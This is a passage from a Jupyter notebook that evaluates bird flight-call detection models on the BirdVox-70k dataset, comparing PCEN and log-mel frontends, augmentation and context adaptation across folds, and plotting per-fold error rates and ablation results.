chance)\n val_accs = [v for v in val_accs if v > 65.0]\n model_accs[model_name] = val_accs\n \n fold_accs.append(model_accs)", "100%|██████████| 18/18 [00:53<00:00, 2.97s/it]\n100%|██████████| 18/18 [00:44<00:00, 2.40s/it]\n100%|██████████| 18/18 [00:43<00:00, 2.18s/it]\n100%|██████████| 18/18 [00:51<00:00, 3.05s/it]\n100%|██████████| 18/18 [01:01<00:00, 2.79s/it]\n100%|██████████| 18/18 [00:39<00:00, 2.19s/it]\n" ], [ "fold_accs", "_____no_output_____" ], [ "fold_id = 0\n\n#model_accs = np.stack(list(fold_accs[fold_id].values()))[:,:]\n#plt.boxplot(model_accs.T);\n\nmodel_names = [\n \"icassp-convnet\", \"icassp-convnet_aug-all-but-noise\", \"icassp-convnet_aug-all\", \n \"pcen-convnet\", \"pcen-convnet_aug-all-but-noise\", \"pcen-convnet_aug-all\",\n \"icassp-ntt-convnet\", \"icassp-ntt-convnet_aug-all-but-noise\", \"icassp-ntt-convnet_aug-all\",\n \"pcen-ntt-convnet\", \"pcen-ntt-convnet_aug-all-but-noise\", \"pcen-ntt-convnet_aug-all\",\n \"icassp-add-convnet\", \"icassp-add-convnet_aug-all-but-noise\", \"icassp-add-convnet_aug-all\",\n \"pcen-add-convnet\", \"pcen-add-convnet_aug-all-but-noise\", \"pcen-add-convnet_aug-all\",\n]\n\n\n\n\nerrs = 100 - np.stack([np.median(x) for x in list(fold_accs[fold_id].values())])\nxmax = np.ceil(np.max(errs)) + 2.5\n\nfig = plt.figure(figsize=(xmax/2, 4), frameon=False)\n\nplt.plot(errs[0], [0], 'o', color='blue');\nplt.plot(errs[1], [1], 'o', color='blue');\nplt.plot(errs[2], [2], 'o', color='blue');\n\nplt.plot(errs[3], [0], 'o', color='orange');\nplt.plot(errs[4], [1], 'o', color='orange');\nplt.plot(errs[5], [2], 'o', color='orange');\n\nplt.text(-0.5, 1, 'no context\\nadaptation',\n horizontalalignment='center',\n verticalalignment='center',\n rotation=90, wrap=True)\n\n#plt.text(max(errs[0], errs[3]) + 1, 0, 'none');\n#plt.text(max(errs[1], errs[4]) + 1, 1, 'geometrical');\n#plt.text(max(errs[2], errs[5]) + 1, 2, 'adaptive');\n\n\nplt.plot(errs[6], [4], 'o', color='blue');\nplt.plot(errs[7], [5], 'o', color='blue');\nplt.plot(errs[8], [6], 'o', color='blue');\n\nplt.plot(errs[9], [4], 'o', color='orange');\nplt.plot(errs[10], [5], 'o', color='orange');\nplt.plot(errs[11], [6], 'o', color='orange');\n\nplt.text(-0.5, 5, 'mixture\\nof experts',\n horizontalalignment='center',\n verticalalignment='center',\n rotation=90, wrap=True)\n\n#plt.text(max(errs[6], errs[9]) + 1, 4, 'none');\n#plt.text(max(errs[7], errs[10]) + 1, 5, 'geometrical');\n#plt.text(max(errs[8], errs[11]) + 1, 6, 'adaptive');\n\n\nplt.plot(errs[12], [8], 'o', color='blue');\nplt.plot(errs[13], [9], 'o', color='blue');\nplt.plot(errs[14], [10], 'o', color='blue');\n\nplt.plot(errs[15], [8], 'o', color='orange');\nplt.plot(errs[16], [9], 'o', color='orange');\nplt.plot(errs[17], [10], 'o', color='orange');\n\nplt.text(-0.5, 9, 'adaptive\\nthreshold',\n horizontalalignment='center',\n verticalalignment='center',\n rotation=90, wrap=True)\n\n#plt.text(max(errs[12], errs[15]) + 1, 8, 'none');\n#plt.text(max(errs[13], errs[16]) + 1, 9, 'geometrical');\n#plt.text(max(errs[14], errs[17]) + 1, 10, 'adaptive');\n\n\nplt.plot([0, xmax], [3, 3], '--', color=[0.75, 0.75, 0.75], linewidth=1.0, alpha=0.5)\nplt.plot([0, xmax], [7, 7], '--', color=[0.75, 0.75, 0.75], linewidth=1.0, alpha=0.5)\n\nplt.xlim([0.0, xmax])\nplt.ylim([10.5, -0.5])\n\nax = fig.gca()\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nax.spines['bottom'].set_visible(False)\nax.spines['left'].set_visible(False)\n\nax.get_yaxis().set_ticks([])\n\nfig.gca().set_xticks(range(0, int(xmax)+1, 
1));\nfig.gca().xaxis.grid(linestyle='--', alpha=0.5)\n\nplt.xlabel(\"Average miss rate (%)\")\n\n#plt.savefig(\"spl_bv-70k-benchmark_fold-\" + units[fold_id] + \".eps\")", "_____no_output_____" ], [ "model_names = [\n# \"icassp-convnet\", \"icassp-convnet_aug-all-but-noise\",\n# \"icassp-ntt-convnet\", \"icassp-ntt-convnet_aug-all-but-noise\",\n# \"icassp-add-convnet\", \"icassp-add-convnet_aug-all-but-noise\",\n# \"pcen-convnet\", \"pcen-convnet_aug-all-but-noise\",\n# \"pcen-ntt-convnet\", \"pcen-ntt-convnet_aug-all-but-noise\",\n# \"pcen-add-convnet\", \"pcen-add-convnet_aug-all-but-noise\",\n]\n\nmodel_names = [\n \"icassp-convnet\", \"icassp-ntt-convnet\", \"icassp-add-convnet\",\n \"icassp-convnet_aug-all-but-noise\", \"icassp-ntt-convnet_aug-all-but-noise\", \"icassp-add-convnet_aug-all-but-noise\",\n \"pcen-convnet\", \"pcen-ntt-convnet\", \"pcen-add-convnet\",\n \"pcen-convnet_aug-all-but-noise\", \"pcen-ntt-convnet_aug-all-but-noise\", \"pcen-add-convnet_aug-all-but-noise\"\n]\n\nplt.gca().invert_yaxis()\n\ncolors = [\n \"#CB0003\", # RED\n \"#E67300\", # ORANGE\n \"#990099\", # PURPLE\n \"#0000B2\", # BLUE\n \"#009900\", # GREEN\n# '#008888', # TURQUOISE\n# '#888800', # KAKI\n '#555555', # GREY\n]\n\nxticks = np.array([1.0, 1.5, 2, 2.5, 3, 4, 5, 6, 8, 10, 12, 16, 20])\n#xticks = np.array(range(1, 20))\nplt.xticks(np.log2(xticks))\n\nxtick_strs = []\nfor xtick in xticks:\n if np.abs(xtick - int(xtick)) == 0:\n xtick_strs.append(\"{:2d}\".format(int(xtick)))\n else:\n xtick_strs.append(\"{:1.1f}\".format(xtick))\n\nprint(xtick_strs)\nplt.gca().set_xticklabels(xtick_strs, family=\"serif\")\nplt.xlim([np.log2(xticks[0]), np.log2(22.0)])\n\nerrs = np.zeros((len(model_names), 6))\n\nfor fold_id in range(6):\n errs[:, fold_id] =\\\n np.log2(100 - np.array([np.median(fold_accs[fold_id][name]) for name in model_names]))\n #ys = [1, 2, 4, 5, 7, 8, 11, 12, 14, 15, 17, 18]\n ys = [1, 2, 3, 5, 6, 7, 10, 11, 12, 14, 15, 16]\n for i in range(len(model_names)):\n plt.plot(errs[i, fold_id], ys[i], 'o', color=colors[fold_id]);\n \nytick_dict = {\n \"icassp-convnet\": \" logmelspec \",\n \"icassp-convnet_aug-all-but-noise\": \"GDA ➡ logmelspec \",\n ##\n \"icassp-ntt-convnet\": \" logmelspec ➡ MoE\",\n \"icassp-ntt-convnet_aug-all-but-noise\": \"GDA ➡ logmelspec ➡ MoE\",\n ##\n \"icassp-add-convnet\": \" logmelspec ➡ AT \",\n \"icassp-add-convnet_aug-all-but-noise\": \"GDA ➡ logmelspec ➡ AT \",\n ###\n ###\n \"pcen-convnet\": \" PCEN \",\n \"pcen-convnet_aug-all-but-noise\": \"GDA ➡ PCEN \",\n ##\n \"pcen-ntt-convnet\": \" PCEN ➡ MoE\",\n \"pcen-ntt-convnet_aug-all-but-noise\": \"GDA ➡ PCEN ➡ MoE\",\n ##\n \"pcen-add-convnet\": \" PCEN ➡ AT \",\n \"pcen-add-convnet_aug-all-but-noise\": \"GDA ➡ PCEN ➡ AT \",\n}\n\nplt.yticks(ys)\nplt.gca().set_yticklabels([ytick_dict[m] for m in model_names], family=\"monospace\")\n\nplt.xlabel(\"Per-fold validation error rate (%)\", family=\"serif\")\n\n \nplt.gca().spines['left'].set_visible(False)\nplt.gca().spines['top'].set_visible(False)\nplt.gca().spines['right'].set_visible(False)\n\nplt.gca().grid(linestyle=\"--\")\n\nplt.savefig('fig_per-fold-validation.svg', bbox_inches=\"tight\")", "[' 1', '1.5', ' 2', '2.5', ' 3', ' 4', ' 5', ' 6', ' 8', '10', '12', '16', '20']\n" ], [ "np.sum(pareto > 0, axis=1)", "_____no_output_____" ], [ "n_val_trials = 1\n\nmodel_names = [\n \"icassp-convnet\", \"icassp-convnet_aug-all-but-noise\", \"icassp-convnet_aug-all\", \n \"icassp-ntt-convnet\", \"icassp-ntt-convnet_aug-all-but-noise\", \"icassp-ntt-convnet_aug-all\",\n 
\"pcen-convnet\", \"pcen-convnet_aug-all-but-noise\", \"pcen-convnet_aug-all\",\n \"icassp-add-convnet\", \"icassp-add-convnet_aug-all-but-noise\", \"icassp-add-convnet_aug-all\",\n \"pcen-add-convnet\", \"pcen-add-convnet_aug-all-but-noise\", \"pcen-add-convnet_aug-all\",\n \"pcen-ntt-convnet_aug-all-but-noise\", \"pcen-ntt-convnet_aug-all\",\n \"pcen-addntt-convnet_aug-all-but-noise\",\n]\nn_models = len(model_names)\nmodel_val_accs = {}\nmodel_test_accs = {}\n \n# Loop over models.\nfor model_id, model_name in enumerate(model_names):\n\n model_dir = os.path.join(models_dir, model_name)\n model_val_accs[model_name] = np.zeros((6,))\n model_test_accs[model_name] = np.zeros((6,))\n\n for test_unit_id in range(6):\n \n # TRIAL SELECTION\n test_unit_str = units[test_unit_id]\n test_unit_dir = os.path.join(model_dir, test_unit_str)\n val_accs = []\n for trial_id in range(n_trials):\n trial_str = \"trial-\" + str(trial_id)\n trial_dir = os.path.join(test_unit_dir, trial_str)\n history_name = \"_\".join([\n dataset_name,\n model_name,\n test_unit_str,\n trial_str,\n \"history.csv\"\n ])\n history_path = os.path.join(\n trial_dir, history_name)\n try:\n history_df = pd.read_csv(history_path)\n val_acc = max(history_df[\"Validation accuracy (%)\"])\n except:\n val_acc = 0.0\n val_accs.append(val_acc)\n\n val_accs = np.array(val_accs)\n trial_id = np.argmax(val_accs)\n\n \n # VALIDATION SET EVALUATION\n trial_str = \"trial-\" + str(trial_id)\n trial_dir = os.path.join(test_unit_dir, trial_str)\n \n fns, fps, tns, tps = [], [], [], []\n validation_units = localmodule.fold_units()[test_unit_id][2]\n \n for val_unit_str in validation_units:\n predictions_name = \"_\".join([\n dataset_name,\n model_name,\n \"test-\" + test_unit_str,\n trial_str,\n \"predict-\" + val_unit_str,\n \"clip-predictions.csv\"\n ])\n prediction_path = os.path.join(\n trial_dir, predictions_name)\n\n # Load prediction.\n with open(prediction_path, 'r') as f:\n reader = csv.reader(f)\n rows = list(reader)\n rows = [\",\".join(row) for row in rows]\n rows = rows[1:]\n rows = \"\\n\".join(rows)\n\n # Parse rows with correct header.\n df = pd.read_csv(StringIO(rows),\n names=[\n \"Dataset\",\n \"Test unit\",\n \"Prediction unit\",\n \"Timestamp\",\n \"Center Freq (Hz)\",\n \"Augmentation\",\n \"Key\",\n \"Ground truth\",\n \"Predicted probability\"])\n y_pred = np.array(df[\"Predicted probability\"])\n y_pred = (y_pred > 0.5).astype('int')\n\n # Load ground truth.\n y_true = np.array(df[\"Ground truth\"])\n \n # Compute confusion matrix.\n tn, fp, fn, tp = sklearn.metrics.confusion_matrix(\n y_true, y_pred).ravel()\n \n tns.append(tn)\n fps.append(fp)\n fns.append(fn)\n tps.append(tp)\n\n\n tn = sum(tns)\n tp = sum(tps)\n fn = sum(fns)\n fp = sum(fps)\n val_acc = 100 * (tn+tp) / (tn+tp+fn+fp)\n model_val_accs[model_name][test_unit_id] = val_acc\n\n \n # TEST SET EVALUATION\n trial_dir = os.path.join(\n test_unit_dir, trial_str)\n predictions_name = \"_\".join([\n dataset_name,\n model_name,\n \"test-\" + test_unit_str,\n trial_str,\n \"predict-\" + test_unit_str,\n \"clip-predictions.csv\"\n ])\n prediction_path = os.path.join(\n trial_dir, predictions_name)\n \n # Load prediction.\n with open(prediction_path, 'r') as f:\n reader = csv.reader(f)\n rows = list(reader)\n rows = [\",\".join(row) for row in rows]\n rows = rows[1:]\n rows = \"\\n\".join(rows)\n\n # Parse rows with correct header.\n df = pd.read_csv(StringIO(rows),\n names=[\n \"Dataset\",\n \"Test unit\",\n \"Prediction unit\",\n \"Timestamp\",\n \"Center Freq 
(Hz)\",\n \"Augmentation\",\n \"Key\",\n \"Ground truth\",\n \"Predicted probability\"])\n y_pred = np.array(df[\"Predicted probability\"])\n y_pred = (y_pred > 0.5).astype('int')\n\n # Load ground truth.\n y_true = np.array(df[\"Ground truth\"])\n\n # Compute confusion matrix.\n tn, fp, fn, tp = sklearn.metrics.confusion_matrix(\n y_true, y_pred).ravel()\n\n test_acc = 100 * (tn+tp) / (tn+tp+fn+fp)\n model_test_accs[model_name][test_unit_id] = test_acc", "_____no_output_____" ], [ "model_names", "_____no_output_____" ], [ "model_diagrams = {\n \"icassp-convnet\": \" melspec -> log \",\n \"icassp-convnet_aug-all-but-noise\": \" geom -> melspec -> log \",\n \"icassp-convnet_aug-all\": \"(noise + geom) -> melspec -> log \",\n \"icassp-ntt-convnet\": \" melspec -> log -> NTT \",\n \"icassp-ntt-convnet_aug-all-but-noise\": \" geom -> melspec -> log -> NTT \",\n \"icassp-ntt-convnet_aug-all\": \"(noise + geom) -> melspec -> log -> NTT \",\n \"pcen-convnet\": \" melspec -> PCEN \",\n \"pcen_convnet_aug-all-but-noise\": \" geom -> melspec -> PCEN \",\n \"pcen-convnet_aug-all\": \"(noise + geom) -> melspec -> PCEN \",\n \"icassp-add-convnet\": \" melspec -> log -> CONCAT\",\n \"icassp-add-convnet_aug-all-but-noise\": \" geom -> melspec -> log -> CONCAT\",\n \"icassp-add-convent_aug-all\": \"(noise + geom) -> melspec -> log -> CONCAT\",\n \"pcen-add-convnet\": \" melspec -> PCEN -> CONCAT\",\n \"pcen-add-convnet_aug-all-but-noise\": \" geom -> melspec -> PCEN -> CONCAT\",\n \"pcen-add-convnet_aug-all\": \"(noise + geom) -> melspec -> PCEN -> CONCAT\",\n \"pcen-ntt-convnet_aug-all-but-noise\": \" geom -> melspec -> PCEN -> NTT \",\n \"pcen-ntt-convnet_aug-all\": \"(noise + geom) -> melspec -> PCEN -> NTT \",\n \"pcen-addntt-convnet_aug-all\": \"(noise + geom) -> melspec -> PCEN -> AFFINE\"}\n\n", "_____no_output_____" ], [ "plt.figure(figsize=(9, 6))\nplt.rcdefaults()\nfig, ax = plt.subplots()\nplt.boxplot(np.stack(model_val_accs.values()).T, 0, 'rs', 0)\n#plt.ylim((-5.0, 1.0))\nplt.setp(ax.get_yticklabels(), family=\"serif\")\nax.set_yticklabels(model_names)\nplt.gca().invert_yaxis()\nax.set_xlabel('Accuracy (%)')\nax.set_title('BirdVox-70k validation set')\nplt.show()", "_____no_output_____" ], [ "plt.figure(figsize=(9, 6))\nplt.rcdefaults()\nfig, ax = plt.subplots()\nplt.boxplot(np.stack(model_test_accs.values()).T, 0, 'rs', 0)\n#plt.ylim((-5.0, 1.0))\nplt.setp(ax.get_yticklabels(), family=\"serif\")\nax.set_yticklabels(model_names)\nplt.gca().invert_yaxis()\nax.set_xlabel('Accuracy (%)')\nax.set_title('BirdVox-70k test set')\nplt.show()", "_____no_output_____" ], [ "model_test_accs", "_____no_output_____" ], [ "ablation_reference_name = \"pcen-add-convnet_aug-all-but-noise\"\nablation_names = [x for x in list(model_val_accs.keys()) if x not in\n [\"icassp-add-convnet_aug-all\",\n ablation_reference_name,\n \"icassp-ntt-convnet\",\n \"pcen-addntt-convnet_aug-all-but-noise\"]]\n\nablation_names = list(reversed(ablation_names))\nytick_dict = {\n \"icassp-convnet\": \" logmelspec \",\n \"icassp-convnet_aug-all-but-noise\": \"GDA -> logmelspec \",\n \"icassp-convnet_aug-all\": \"ADA -> logmelspec \",\n ##\n \"icassp-ntt-convnet\": \" logmelspec -> MoE\",\n \"icassp-ntt-convnet_aug-all-but-noise\": \"GDA -> logmelspec -> MoE\",\n \"icassp-ntt-convnet_aug-all\": \"ADA -> logmelspec -> MoE\",\n ##\n \"icassp-add-convnet\": \" logmelspec -> AT \",\n \"icassp-add-convnet_aug-all-but-noise\": \"GDA -> logmelspec -> AT \",\n \"icassp-add-convnet_aug-all\": \"ADA -> logmelspec -> AT \",\n ###\n ###\n 
\"pcen-convnet\": \" PCEN \",\n \"pcen-convnet_aug-all-but-noise\": \"GDA -> PCEN \",\n \"pcen-convnet_aug-all\": \"ADA -> PCEN \",\n ##\n \"pcen-ntt-convnet\": \" PCEN -> MoE\",\n \"pcen-ntt-convnet_aug-all-but-noise\": \"GDA -> PCEN -> MoE\",\n \"pcen-ntt-convnet_aug-all\": \"GDA -> PCEN -> MoE\",\n ##\n \"pcen-add-convnet\": \" PCEN -> AT \",\n \"pcen-add-convnet_aug-all-but-noise\": \"GDA -> PCEN -> AT \",\n \"pcen-add-convnet_aug-all\": \"ADA -> PCEN -> AT \",\n ###\n \"pcen-addntt-convnet_aug-all-but-noise\":\"GDA -> PCEN -> AT + MoE \",\n}\nreference_val_accs = model_val_accs[ablation_reference_name]\nablation_val_accs = [\n 100 * (reference_val_accs - model_val_accs[name]) / (100 - reference_val_accs)\n for name in ablation_names]\n\n\nablation_names = list(reversed([ablation_names[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))\nablation_val_accs = list(reversed([ablation_val_accs[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))\nablation_val_accs = np.array(ablation_val_accs)\n\nplt.rcdefaults()\nfig, ax = plt.subplots(figsize=(8, 6))\nplt.grid(linestyle=\"--\")\nplt.axvline(0.0, linestyle=\"--\", color=\"#009900\")\nplt.plot([0.0], [1+len(ablation_val_accs)], 'd',\n color=\"#009900\", markersize=10.0)\n\ncolors = [\n \"#CB0003\", # RED\n \"#E67300\", # ORANGE\n \"#990099\", # PURPLE\n \"#0000B2\", # BLUE\n \"#009900\", # GREEN\n# '#008888', # TURQUOISE\n# '#888800', # KAKI\n '#555555', # GREY\n]\n\n\nplt.boxplot(ablation_val_accs.T, 0, 'rs', 0,\n whis=100000, patch_artist=True, boxprops={\"facecolor\": \"w\"})\nfor i, color in enumerate(colors):\n plt.plot(np.array(ablation_val_accs[:,i]),\n range(1, 1+len(ablation_val_accs[:,i])), 'o', color=color)\nfig.canvas.draw()\n\nplt.setp(ax.get_yticklabels(), family=\"serif\")\n#ax.set_yticklabels([\n# \"adaptive threshold\\nreplaced by\\n mixture of experts\",\n# \"no data augmentation\",\n# \"addition of noise\\nto frontend but not to\\nauxiliary features\",\n# \"no context adaptation\",\n# \"PCEN\\nreplaced by\\nlog-mel frontend\",\n# \"state of the art [X]\"])\nax.set_yticks(range(1, 2+len(ablation_val_accs)))\nax.set_yticklabels([ytick_dict[x] for x in\n (ablation_names + [ablation_reference_name])], family=\"monospace\")\nplt.gca().invert_xaxis()\nplt.gca().invert_yaxis()\nax.set_xlabel('Relative difference in validation miss rate (%)', family=\"serif\")\nplt.ylim([0.5, 1.5+len(ablation_names)])\nplt.show()\n\n\nreference_test_accs = model_test_accs[ablation_reference_name]\nprint(reference_test_accs)\nbaseline_test_accs = model_test_accs[\"icassp-convnet_aug-all\"]\nprint(baseline_test_accs)\n\nplt.savefig('fig_exhaustive-per-fold-validation.eps', bbox_inches=\"tight\")\nplt.savefig('fig_exhaustive-per-fold-validation.png', bbox_inches=\"tight\", dpi=1000)", "_____no_output_____" ], [ "%matplotlib inline\nablation_reference_name = \"pcen-add-convnet_aug-all-but-noise\"\n#ablation_names = [x for x in list(model_val_accs.keys()) if x not in\n# [\"icassp-add-convnet_aug-all\",\n# ablation_reference_name,\n# \"icassp-ntt-convnet\",\n# \"pcen-addntt-convnet_aug-all-but-noise\"]]\nablation_names = [\n \"pcen-ntt-convnet_aug-all-but-noise\",\n \"pcen-add-convnet\",\n \"pcen-add-convnet_aug-all\",\n \"pcen-convnet_aug-all-but-noise\",\n \"icassp-convnet_aug-all-but-noise\",\n \"icassp-convnet_aug-all\"\n]\n\nablation_names = list(reversed(ablation_names))\nytick_dict = {\n \"icassp-convnet\": \" logmelspec \",\n \"icassp-convnet_aug-all-but-noise\": \"GDA -> logmelspec \",\n \"icassp-convnet_aug-all\": \"ADA 
-> logmelspec \",\n ##\n \"icassp-ntt-convnet\": \" logmelspec -> MoE\",\n \"icassp-ntt-convnet_aug-all-but-noise\": \"GDA -> logmelspec -> MoE\",\n \"icassp-ntt-convnet_aug-all\": \"ADA -> logmelspec -> MoE\",\n ##\n \"icassp-add-convnet\": \" logmelspec -> AT \",\n \"icassp-add-convnet_aug-all-but-noise\": \"GDA -> logmelspec -> AT \",\n \"icassp-add-convnet_aug-all\": \"ADA -> logmelspec -> AT \",\n ###\n ###\n \"pcen-convnet\": \" PCEN \",\n \"pcen-convnet_aug-all-but-noise\": \"GDA -> PCEN \",\n \"pcen-convnet_aug-all\": \"ADA -> PCEN \",\n ##\n \"pcen-ntt-convnet\": \" PCEN -> MoE\",\n \"pcen-ntt-convnet_aug-all-but-noise\": \"GDA -> PCEN -> MoE\",\n \"pcen-ntt-convnet_aug-all\": \"GDA -> PCEN -> MoE\",\n ##\n \"pcen-add-convnet\": \" PCEN -> AT \",\n \"pcen-add-convnet_aug-all-but-noise\": \"GDA -> PCEN -> AT \",\n \"pcen-add-convnet_aug-all\": \"ADA -> PCEN -> AT \",\n ###\n \"pcen-addntt-convnet_aug-all-but-noise\":\"GDA -> PCEN -> AT + MoE \",\n}\nreference_val_accs = model_val_accs[ablation_reference_name]\nablation_val_accs = [\n 100 * (reference_val_accs - model_val_accs[name]) / (100 - reference_val_accs)\n for name in ablation_names]\n\n\nablation_names = list(reversed([ablation_names[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))\nablation_val_accs = list(reversed([ablation_val_accs[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))\nablation_val_accs = np.array(ablation_val_accs)\n\nplt.rcdefaults()\nfig, ax = plt.subplots(figsize=(7, 4))\nplt.grid(linestyle=\"--\")\nplt.axvline(0.0, linestyle=\"--\", color=\"#009900\")\nplt.plot([0.0], [1+len(ablation_val_accs)], 'd',\n color=\"#009900\", markersize=10.0)\n\ncolors = [\n \"#CB0003\", # RED\n \"#E67300\", # ORANGE\n \"#990099\", # PURPLE\n \"#0000B2\", # BLUE\n \"#009900\", # GREEN\n# '#008888', # TURQUOISE\n# '#888800', # KAKI\n '#555555', # GREY\n]\n\n\nfor i, color in enumerate(colors):\n plt.plot(np.array(ablation_val_accs[:,i]),\n range(1, 1+len(ablation_val_accs[:,i])), 'o', color=color)\nfig.canvas.draw()\nplt.boxplot(ablation_val_accs.T, 0, 'rs', 0,\n whis=100000)\n\n\nplt.setp(ax.get_yticklabels(), family=\"serif\")\nax.set_yticklabels(reversed([\n \"BirdVoxDetect\",\n \"adaptive threshold\\nreplaced by\\n mixture of experts\",\n \"no data augmentation\",\n \"addition of noise\\nto frontend but not to\\nauxiliary features\",\n \"no context adaptation\",\n \"PCEN\\nreplaced by\\nlog-mel frontend\",\n \"previous state of the art [57]\"]))\nax.set_yticks(range(1, 2+len(ablation_val_accs)))\n#ax.set_yticklabels([ytick_dict[x] for x in\n# (ablation_names + [ablation_reference_name])], family=\"monospace\")\nplt.gca().invert_xaxis()\nplt.gca().invert_yaxis()\nax.set_xlabel('Relative difference in validation miss rate (%)', family=\"serif\")\nplt.ylim([0.5, 1.5+len(ablation_names)])\n#plt.show()\n\n\nreference_test_accs = model_test_accs[ablation_reference_name]\nprint(reference_test_accs)\nbaseline_test_accs = model_test_accs[\"icassp-convnet_aug-all\"]\nprint(baseline_test_accs)\n\nplt.savefig('fig_ablation-study.eps', bbox_inches=\"tight\")\nplt.savefig('fig_ablation-study.svg', bbox_inches=\"tight\")\nplt.savefig('fig_ablation-study.png', bbox_inches=\"tight\", dpi=1000)", "[79.46001367 97.05073996 98.99593987 98.44224924 97.19754977 96.00087732]\n[73.95762133 94.77801268 98.76549984 94.57636778 83.8820827 94.04152654]\n" ], [ "2", "_____no_output_____" ], [ "n_trials = 10\nreport = {}\n\nfor model_name in model_names:\n\n model_dir = os.path.join(models_dir, model_name)\n\n\n # Initialize 
dictionaries\n model_report = {\n \"validation\": {},\n \"test_cv-acc_th=0.5\": {}\n }\n\n # Initialize matrix of validation accuracies.\n val_accs = np.zeros((n_units, n_trials))\n val_tps = np.zeros((n_units, n_trials))\n val_tns = np.zeros((n_units, n_trials))\n val_fps = np.zeros((n_units, n_trials))\n val_fns = np.zeros((n_units, n_trials))\n \n test_accs = np.zeros((n_units, n_trials))\n test_tps = np.zeros((n_units, n_trials))\n test_tns = np.zeros((n_units, n_trials))\n test_fps = np.zeros((n_units, n_trials))\n test_fns = np.zeros((n_units, n_trials))\n\n\n # Loop over test units.\n for test_unit_id, test_unit_str in enumerate(units):\n\n\n # Define directory for test unit.\n test_unit_dir = os.path.join(model_dir, test_unit_str)\n\n\n # Retrieve fold such that unit_str is in the test set.\n folds = localmodule.fold_units()\n fold = [f for f in folds if test_unit_str in f[0]][0]\n test_units = fold[0]\n validation_units = fold[2]\n\n\n # Loop over trials.\n for trial_id in range(n_trials):\n\n\n # Define directory for trial.\n trial_str = \"trial-\" + str(trial_id)\n trial_dir = os.path.join(test_unit_dir, trial_str)\n\n\n # Initialize.\n break_switch = False\n val_fn = 0\n val_fp = 0\n val_tn = 0\n val_tp = 0\n\n\n # Loop over validation units.\n for val_unit_str in validation_units:\n\n predictions_name = \"_\".join([\n dataset_name,\n model_name,\n \"test-\" + test_unit_str,\n \"trial-\" + str(trial_id),\n \"predict-\" + val_unit_str,\n \"clip-predictions.csv\"\n ])\n prediction_path = os.path.join(\n trial_dir, predictions_name)\n\n # Load prediction.\n csv_file = pd.read_csv(prediction_path)\n \n # Parse prediction.\n if model_name == \"icassp-convnet_aug-all\":\n y_pred = np.array(csv_file[\"Predicted probability\"])\n y_true = np.array(csv_file[\"Ground truth\"])\n elif model_name == \"pcen-add-convnet_aug-all-but-noise\":\n with open(prediction_path, 'r') as f:\n reader = csv.reader(f)\n rows = list(reader)\n rows = [\",\".join(row) for row in rows]\n rows = rows[1:]\n rows = \"\\n\".join(rows)\n\n # Parse rows with correct header.\n df = pd.read_csv(StringIO(rows),\n names=[\n \"Dataset\",\n \"Test unit\",\n \"Prediction unit\",\n \"Timestamp\",\n \"Center Freq (Hz)\",\n \"Augmentation\",\n \"Key\",\n \"Ground truth\",\n \"Predicted probability\"])\n y_pred = np.array(df[\"Predicted probability\"])\n y_true = np.array(df[\"Ground truth\"])\n \n # Threshold.\n y_pred = (y_pred > 0.5).astype('int')\n\n # Check that CSV file is not corrupted.\n if len(y_pred) == 0:\n break_switch = True\n break\n\n # Compute confusion matrix.\n tn, fp, fn, tp = sklearn.metrics.confusion_matrix(\n y_true, y_pred).ravel()\n\n val_fn = val_fn + fn\n val_fp = val_fp + fp\n val_tn = val_tn + tn\n val_tp = val_tp + tp\n\n\n if not break_switch:\n val_acc = (val_tn+val_tp) / (val_fn+val_fp+val_tn+val_tp)\n else:\n val_fn = 0\n val_fp = 0\n val_tn = 0\n val_tp = 0\n val_acc = 0.0\n \n val_fns[test_unit_id, trial_id] = val_fn\n val_fps[test_unit_id, trial_id] = val_fp\n val_tns[test_unit_id, trial_id] = val_tn\n val_tps[test_unit_id, trial_id] = val_tp\n val_accs[test_unit_id, trial_id] = val_acc\n\n\n # Initialize.\n predictions_name = \"_\".join([\n dataset_name,\n model_name,\n \"test-\" + test_unit_str,\n \"trial-\" + str(trial_id),\n \"predict-\" + test_unit_str,\n \"clip-predictions.csv\"\n ])\n prediction_path = os.path.join(\n trial_dir, predictions_name)\n\n\n with open(prediction_path, 'r') as f:\n reader = csv.reader(f)\n rows = list(reader)\n rows = [\",\".join(row) for row in rows]\n 
rows = rows[1:]\n rows = \"\\n\".join(rows)\n\n # Parse rows with correct header.\n df = pd.read_csv(StringIO(rows),\n names=[\n \"Dataset\",\n \"Test unit\",\n \"Prediction unit\",\n \"Timestamp\",\n \"Center Freq (Hz)\",\n \"Augmentation\",\n \"Key\",\n \"Ground truth\",\n \"Predicted probability\"])\n y_pred = np.array(df[\"Predicted probability\"])\n y_pred = (y_pred > 0.5).astype('int')\n y_true = np.array(df[\"Ground truth\"])\n\n # Check that CSV file is not corrupted.\n if len(y_pred) == 0:\n test_tn, test_fp, test_fn, test_tp = 0, 0, 0, 0\n test_acc = 0.0\n else:\n # Load ground truth.\n y_true = np.array(df[\"Ground truth\"])\n # Compute confusion matrix.\n test_tn, test_fp, test_fn, test_tp =\\\n sklearn.metrics.confusion_matrix(\n y_true, y_pred).ravel()\n test_acc = (test_tn+test_tp) / (test_fn+test_fp+test_tn+test_tp)\n\n\n test_fns[test_unit_id, trial_id] = test_fn\n test_fps[test_unit_id, trial_id] = test_fp\n test_tns[test_unit_id, trial_id] = test_tn\n test_tps[test_unit_id, trial_id] = test_tp\n test_accs[test_unit_id, trial_id] = test_acc \n \n model_report[\"validation\"][\"FN\"] = test_fn\n model_report[\"validation\"][\"FP\"] = test_fp\n model_report[\"validation\"][\"TN\"] = test_tn\n model_report[\"validation\"][\"TP\"] = test_tp\n model_report[\"validation\"][\"accuracy\"] = val_accs\n \n best_trials = np.argsort(model_report[\"validation\"][\"accuracy\"], axis=1)\n model_report[\"validation\"][\"best_trials\"] = best_trials\n \n model_report[\"test_cv-acc_th=0.5\"][\"FN\"] = test_fns\n model_report[\"test_cv-acc_th=0.5\"][\"FP\"] = test_fps\n model_report[\"test_cv-acc_th=0.5\"][\"TN\"] = test_tns\n model_report[\"test_cv-acc_th=0.5\"][\"TP\"] = test_tps\n model_report[\"test_cv-acc_th=0.5\"][\"accuracy\"] = test_accs\n\n \n cv_accs = []\n for eval_trial_id in range(5):\n cv_fn = 0\n cv_fp = 0\n cv_tn = 0\n cv_tp = 0\n\n for test_unit_id, test_unit_str in enumerate(units):\n\n best_trials = model_report[\"validation\"][\"best_trials\"]\n 